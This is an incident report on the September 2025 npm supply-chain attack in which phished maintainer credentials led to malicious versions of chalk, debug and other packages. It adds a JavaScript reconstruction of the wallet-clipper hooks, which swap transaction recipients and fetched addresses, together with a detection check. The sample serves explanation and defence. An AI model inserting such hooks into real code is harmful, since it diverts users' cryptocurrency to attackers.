Supply chain
npm Supply Chain Attack: chalk, debug, and 16 Other Packages Compromised
Incident Details
On September 8, 2025, 18 widely used npm packages were compromised after an account takeover of the maintainer 'qix'. The affected packages collectively receive more than 2.6 billion downloads per week. The malicious versions were live for roughly two hours before they were detected and removed. The payload targeted browser-based cryptocurrency wallets: it hooked the web3 provider and network APIs in the page to swap destination addresses and reroute transactions. During that two-hour window the malicious versions reached an estimated 1 in 10 cloud environments. CISA issued an advisory on September 23, 2025. A follow-on campaign, 'Shai-Hulud 2.0', was identified in November 2025. The incident is an exemplary case of npm account takeover: a phishing site acting as an adversary-in-the-middle captured the maintainer's credentials together with a live TOTP code, defeating TOTP-based MFA without breaking it.
Technical Details
- Initial Attack Vector
- Phishing / adversary-in-the-middle attack against package maintainer 'qix' (Josh Junon): a fake npm 2FA-reset email pointed to a lookalike domain (npmjs.help) whose login page captured the username, password and live TOTP code and relayed them to the real npm site within the code's validity window
- Vendor / Product
- npm registry
- Software Package
- chalk, debug, ansi-styles, strip-ansi, duckdb (18 packages total)
- Malware Family
- Browser crypto wallet hijacker (address-swapping clipper): hooks window.ethereum and Solana wallet APIs and wraps fetch/XHR to swap recipient addresses and reroute transactions
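To make the "hooking" concrete, the following is a minimal reconstruction of the technique, added here as an example and not the actual payload or code from any of the affected packages: a third-party bundle wraps the injected wallet provider's request method and the page's fetch so that the recipient of eth_sendTransaction and any address appearing in a fetched response are replaced with an attacker-controlled address. It also shows the integrity check a page or extension can run, namely taking references to these surfaces at load time and comparing them before signing. The attacker address, the fake provider, the JSON "API response" and the URL are all constructed for the demo; in a browser ethereum.request and fetch are Promise-based, whereas here they are synchronous so results can be inspected directly.

```javascript
// Added example, not the real payload or any npm project's code: a minimal
// reconstruction of the hooking technique, plus an integrity check.
// Everything below (addresses, provider, response body, URL) is made up.
const ATTACKER_ADDR = "0x1111111111111111111111111111111111111111"; // hypothetical
const ETH_ADDR_RE = /0x[0-9a-fA-F]{40}/g;

// A fake page environment: an injected wallet provider and a fetch that
// returns a constructed JSON body containing a deposit address.
function makeWindow() {
  const sent = [];
  return {
    sent, // what actually reached the wallet
    ethereum: {
      request(args) {
        if (args.method === "eth_sendTransaction") sent.push(args.params[0]);
        return "0xtxhash";
      },
    },
    fetch(url) {
      return JSON.stringify({ url, depositAddress: "0x2222222222222222222222222222222222222222" });
    },
  };
}

// Take references to the trusted surfaces before any third-party bundle runs.
function snapshot(win) {
  return { fetch: win.fetch, request: win.ethereum.request };
}

// The hook: rewrite the recipient of eth_sendTransaction, and rewrite any
// address in a fetched response body so the page itself presents the
// attacker's address to the user.
function installHook(win) {
  const origRequest = win.ethereum.request.bind(win.ethereum);
  win.ethereum.request = (args) => {
    if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
      args = { ...args, params: [{ ...args.params[0], to: ATTACKER_ADDR }] };
    }
    return origRequest(args);
  };
  const origFetch = win.fetch.bind(win);
  win.fetch = (...a) => origFetch(...a).replace(ETH_ADDR_RE, ATTACKER_ADDR);
}

// Integrity check: the surfaces a clipper must hook are no longer the objects
// captured at load time. Run it early and again right before signing.
function tamperedSurfaces(win, base) {
  const out = [];
  if (win.fetch !== base.fetch) out.push("fetch");
  if (win.ethereum.request !== base.request) out.push("ethereum.request");
  return out;
}

// Drive the whole thing: one transaction before the hook, one after.
function runDemo() {
  const win = makeWindow();
  const base = snapshot(win);
  const tx = {
    from: "0x3333333333333333333333333333333333333333",
    to: "0x2222222222222222222222222222222222222222",
    value: "0x1",
  };
  win.ethereum.request({ method: "eth_sendTransaction", params: [tx] });
  const before = { to: win.sent[0].to, tampered: tamperedSurfaces(win, base) };
  installHook(win);
  win.ethereum.request({ method: "eth_sendTransaction", params: [tx] });
  const body = JSON.parse(win.fetch("https://api.example.invalid/deposit"));
  const after = {
    to: win.sent[1].to,
    fetchedAddr: body.depositAddress,
    tampered: tamperedSurfaces(win, base),
  };
  return { before, after };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The identity check is a heuristic, not a guarantee: a bundle that runs before the snapshot is taken, or that replaces the provider object wholesale, will pass it. Its value is in being cheap to run at the moment that matters, immediately before a signing request, where any divergence from the load-time references is a hard stop rather than a warning.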
Timeline
- 2025-09-08 Breach occurred
- 2025-09-08 Publicly disclosed